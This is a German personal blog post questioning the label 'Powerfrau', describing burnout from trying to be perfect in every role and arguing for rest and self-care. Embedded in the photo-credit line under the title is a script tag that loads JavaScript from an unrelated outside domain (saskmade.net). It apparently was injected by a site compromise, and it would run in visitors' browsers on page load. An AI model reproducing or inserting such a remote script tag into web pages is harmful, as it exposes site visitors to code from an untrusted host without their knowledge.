Powerfrau . Ein Qualitätslabel?

 (c) vladimirfloyd<script src='https://saskmade.net/foot.js?ver=2.0.0' type='text/javascript'></script>

Powerfrau - was ist das?

Duden.de erklärt den Begriff so: eine tüchtige Frau voll Kraft und Stärke.Doch was ist eine Powerfrau wirklich? Was kann sie und was zeichnet sie aus?

Eine Powerfrau kann alles. Sie ist perfekt und voller Tatendrang. Natürlich ist sie erfolgreich in ihrem Beruf, sie hat ihren Haushalt im Griff und ist ihren Kindern eine liebevolle Mutter. Sie ist eine perfekte (Ehe-)Frau und Partnerin, sexy, intelligent und natürlich eine begnadete Liebhaberin. Sie ist eine tolle Freundin, Schwester und Tochter, immer „up-to-date“ und eine perfekte Gastgeberin. Darüber hinaus macht sie im Businesskostüm ebenso eine tolle Figur wie im Sportdress. Eine Traumfrau also

So gesehen kann ich verstehen, dass „Powerfrau“ ein Gütesiegel ist, das man, bzw. frau, gerne trägt. Aber ist das wirklich so?
Sicher ist es schmeichelhaft, wenn alle glauben, dass frau alles kann, alles schafft und jede Hürde nimmt... Doch das kann ganz schön anstrengend sein.

Auszeichnung oder Belastung?

Ich frage mich, was bewirkt das Label „Powerfrau“ in mir? Was löst es in mir aus?
Es gab Zeiten, da habe ich diese Bezeichnung durchaus als Auszeichnung empfunden. Ich war stolz darauf, wenn mein Umfeld mich so bezeichnete. Ich fühlte mich stark, unbesiegbar, mein Kräftehaushalt schien unerschöpflich...

Mein eigener Anspruch, in allen Rollen perfekt zu sein, forderte ständige Höchstleistung von mir: als Mutter, Tochter, Schwester, Studentin, Berufsanfängerin, Managerin, Partnerin, Geliebte, Hausfrau, WorkingMum, Köchin...

Doch in einer Rolle war ich nicht perfekt.

Bei allem Bestreben überall Top-Leistungen abzugeben, egal in welcher meiner Rollen, hatte ich mich selbst ganz vergessen. Meine Bedürfnisse und Wünsche blieben von mir ungehört. Zeit für mich, Zeit zum Ausspannen und Regenerieren nahm ich mir nicht.
Ich verleugnete mich selbst, betrieb Raubbau an Körper uns Seele – nur um dem eigenen Anspruch zu genügen. Das Label Powerfrau setzte mich zunehmend unter Druck  und wurde zur Belastung.

Powerfrau oder Frau mit Power

Darf eine Powerfrau sich ausruhen und regenerieren?
Darf eine Powerfrau sich schwach und klein fühlen?
Darf eine Powerfrau auch einmal krank sein und um Hilfe bitten?
Darf eine Powerfrau auch einmal nicht gut drauf sein?

Ja! Selbstverständlich!
Denn auch eine Frau mit Power, Elan und einem schier unendlichen Energiereserven muss sich regenerieren können und braucht Zeit für sich. Auch bei ihr gibt es Momente, in denen sie Kraft und Unterstützung von andern braucht, in denen sie Schwäche zeigen und um Hilfe bitten darf. Sie muss dies vielleicht sogar tun um menschlich zu bleiben, um gesund zu bleiben, um sich selbst zu lieben und anzunehmen.

Powerfrau - nein danke!

Manchmal zucke ich fast ein wenig zusammen, wenn ich den bewundernden Ausspruch höre: „Was für eine Powerfrau!“
Hoffentlich besitzt diese Frau genug Power, um sich auch um ihre eigenen Bedürfnisse zu kümmern.

Ich möchte heute keine Powerfrau mehr sein! Vielmehr verstehe ich mich als eine Frau mit einer positiven Ausstrahlung, die weiß was sie will und die ihre Ziele erreicht, indem sie ihre Energie sinnvoll einsetzt.

Foto: © vladimirfloyd - Fotolia.com

Kommentare geschlossen.